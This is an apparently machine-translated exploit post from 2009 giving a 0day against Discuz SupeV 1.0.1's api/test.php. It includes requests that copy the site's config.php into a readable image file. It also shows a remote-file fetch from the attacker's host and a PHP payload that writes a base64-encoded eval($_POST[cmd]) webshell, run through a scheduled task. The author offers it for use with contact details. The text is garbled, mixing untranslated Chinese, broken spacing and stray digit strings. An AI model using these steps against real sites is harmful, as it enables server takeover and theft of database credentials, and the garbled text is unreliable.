SupeV 1.0.1 0DAY-vulnerability warning-the black bar safety net

2009-02-28T00:00:00
ID MYHACK58:62200922345
Type myhack58
Reporter 佚名
Modified 2009-02-28T00:00:00

Description

Source: WEB Security manual

Thank '&waste. Delivery

Hello everyone, I'm nameless

Today released a discuz its products "video podcast SupeV 1.0.1" 0day

Vulnerability file: api目录下test.php

Looking directly at the code

$str=file_get_contents( $thumb );//first the 1 8 line with file_get_contents() to read$thumb parameter file content, note that here you can also read the remote file, $path = ".". getthumb_path( $vid );//paragraph 1 Line 9 get the path parameter $vid $opt_big = array(

the "targetfile" => $path.". jpg",

"attach" => $attach['attach'],

"ext" => $attach['extension'],

"ratio" => false,

"width" => THUMB_BIG_WIDTH,

"height" => THUMB_BIG_HEIGHT

); //2 Line 4 to 3 line 9 defined$opt_big and$opt_small array

@sf_copy( $opt_big['targetfile'], $opt_small['targetfile'] );//followed by the 4 row 0 on Start copy, notice, put the$opt_big in the array targetfile copy to$opt_small array targetfile

Vulnerability is formed, directly to the get request

api/test. php? thumb=../config. php&vid=../../1

会 把 config.php 复制 到 根 目录 下 1.jpg

This will give the site configuration file, phpmyadmin link up, if it is the root connection, a direct export of the shell, not the check the check should be articles, not described here.

If not root, just register an account, link up to the user's admgid into 1 in the sv_members table

Next speaking background get the shell,

Front test. php code file_get_contents() can read the remote file is written to the site directory

api/test. php? thumb=http://your address space/test. txt&vid=../../../../inc/crons/1

写 到 inc/crons/1.jpg

test. txt content

<? php fputs(fopen("111.php","w"),base64_decode("PD9ldmFsKCRfUE9TVFtjbWRdKTs/Pg=="));?>

作用 是 在 当前 目录 生成 111.php content is LANKER word password cmd

Why write here, you know, into the background, the point on the top of the auxiliary Tool, the new scheduled task ! 2 0 0 9 0 2 2 7 2 3 3 5 5 5 4 1 1 6

! 2 0 0 9 0 2 2 7 2 3 3 6 0 6 5 5 4 2

! 2 0 0 9 0 2 2 7 2 3 3 6 1 5 1 5 5 1 Submission on the implementation of the inc/crons/1. jpg content will be generated under the root directory 1 1 1. php content is LANKER word password cmd Successfully get the shell finished remember to delete the scheduled task, otherwise the site will not open,

Not used contact me Contact qq: 5 7 1 1 2 8 4 8 cainiaokunmm@163.com Powered by SupeV 1.0.1 exploit Found by : nameless